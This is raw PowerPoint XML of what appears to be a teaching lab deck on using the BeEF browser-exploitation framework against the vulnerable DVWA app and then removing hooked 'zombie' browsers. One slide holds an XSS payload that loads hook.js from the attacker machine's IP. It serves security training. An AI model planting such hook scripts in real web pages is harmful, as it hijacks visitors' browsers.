            <a:ext cx="9773802" cy="55710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54FAB5-1460-426B-9E37-A3D8B9DE3316}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="263373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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute ./beef again…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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271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ECB1B4CC-6665-4C7A-8DC7-30A902157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16254"/>
            <a:ext cx="10905066" cy="48254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4D98DE-ADE7-4665-BE56-8A14D4D48644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="263373"/>
            <a:ext cx="75881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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Highlight the URL and right click to open the link in the browser and you will get the beef console UI Panel…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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433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DEBD88-EF79-4C28-9A78-467C0E4F6E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872601" y="875932"/>
            <a:ext cx="7588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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hook your DVWA application to continue ….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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D4CD4C-FBD3-4A35-B887-36C664074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35948"/>
            <a:ext cx="76200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05305D-5D62-4077-83B7-1C125D7CB2B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105221" y="606186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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>="http://192.168.67.134:3000/hook.js"&gt;&lt;/script&gt;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E8526738-955C-430F-9E92-48918265D692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6519996" y="5197360"/>
            <a:ext cx="257277" cy="12443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26DD38-92F3-41A1-925A-3408E06B0167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663954" y="5264724"/>
            <a:ext cx="23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Kali Linux IP Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3339594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05DFE0-966C-45A2-BE7F-EE122ACE0038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216856" y="1862812"/>
            <a:ext cx="953866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 NOT REMOVE THE ZOOMBIES AND TRY TO HOOK ANY OTHER WEBSITE AFTER THIS !!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411880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DEF603-F841-449A-82D5-4630C2C27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7547"/>
            <a:ext cx="12192000" cy="4318563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8E0695E6-9AA6-41E0-8317-447D18152DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377543" y="5971579"/>
            <a:ext cx="490804" cy="265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975A4EB-5B41-4A23-B93A-12A9D0E8F200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1458686" y="1491343"/>
            <a:ext cx="576943" cy="6966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D5A9C8-B648-4F8C-B5BC-61B01EB06C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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browser is set to the web site ‘s URL, check that and see for yourself. Mine is pointing to a different website because I have reset it. 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325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ED808B-FAC0-4C57-8C97-C6244683A5A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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we want to test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> web site, we need to remove the zombies or remove all of them in the Offline Browser. Why?</a:t>
            </a:r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91F9C5-6687-4A79-845D-A01496DE2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1931504"/>
            <a:ext cx="82391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6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B22188-0247-468C-B939-0CA0A5672DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="1054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To remove it, just right click on the browser and select [Delete Zombie] to delete.</a:t>
            </a:r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E93E47-457E-45E7-8C6B-78422D88F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8955"/>
            <a:ext cx="12192000" cy="298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8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67613E-4B1F-4EEA-89BF-61AB956C62B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733713" y="1016752"/>
            <a:ext cx="8724574" cy="48320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Close your browser and reboot the system and start beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="440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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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again to see they are still there. If they are still there, follow the pages below. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4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Else, you are ok to use it to test another web site.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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191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D1B6DE-5186-4570-9B76-EB648603B9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="10542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Follow the steps below…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703FD6-836C-478D-96D2-9A5D9ACB3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003" y="1585950"/>
            <a:ext cx="8216421" cy="4774826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12F9B74-6D07-4ABB-A042-62295AB80C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944779" y="1922928"/>
            <a:ext cx="578224" cy="416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1D4BA8E-2DDD-4605-A75A-E1902D87C2FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2083732" y="2573752"/>
            <a:ext cx="578224" cy="416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993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67613E-4B1F-4EEA-89BF-61AB956C62B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733713" y="1016752"/>
            <a:ext cx="8724574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Reboot the system and start beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="440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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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again …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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9970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2F7FEA6FBF1641BB6A189BC6405E4D" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="702c47aa2f1b757c6992f93df2575d86">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="16673fb3-88a0-4412-9559-9376d0b32992" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="81ff16288fd46e5497816dfe0ce691ed" ns1:_="" ns2:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="16673fb3-88a0-4412-9559-9376d0b329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1:_ip_UnifiedCompliancePolicyProperties" minOccurs="0"/>
                <xsd:element ref="ns1:_ip_UnifiedCompliancePolicyUIAction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673fb3-88a0-4412-9559-9376d0b329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17145D-6F82-4297-BE3B-7F8F27BDFB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A9D823-0FF4-4F79-A041-C2B81A9438E5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  <ds:schemaRef ds:uri="93089eef-c513-4be9-82d5-5a13ba43949f"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="ffd8f815-88b9-4c59-a97c-62b35b622469"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A6D4C281-0C18-4646-A25B-DFD89CB4DE29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Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>44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BEeF – How to remove hooked browser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BEeF – How to remove hooked browser</dc:title>
  <dc:creator>Hock Guan TAN (NP)</dc:creator>
  <cp:lastModifiedBy>Hock Guan TAN (NP)</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-07T23:26:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-12T12:45:46Z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0286cb9-b49f-4646-87a5-340028348160_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160_SetDate">
    <vt:lpwstr>2021-12-07T23:26:54Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160_Name">
    <vt:lpwstr>30286cb9-b49f-4646-87a5-340028348160</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160_SiteId">
    <vt:lpwstr>cba9e115-3016-4462-a1ab-a565cba0cdf1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160_ActionId">
    <vt:lpwstr>e5a27b3b-5fff-464b-a6b1-222253086e69</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160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                    Official (Closed) - Non Sensitive</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="ContentTypeId">
    <vt:lpwstr>0x010100742F7FEA6FBF1641BB6A189BC6405E4D</vt:lpwstr>
  </property>
</Properties>
</file>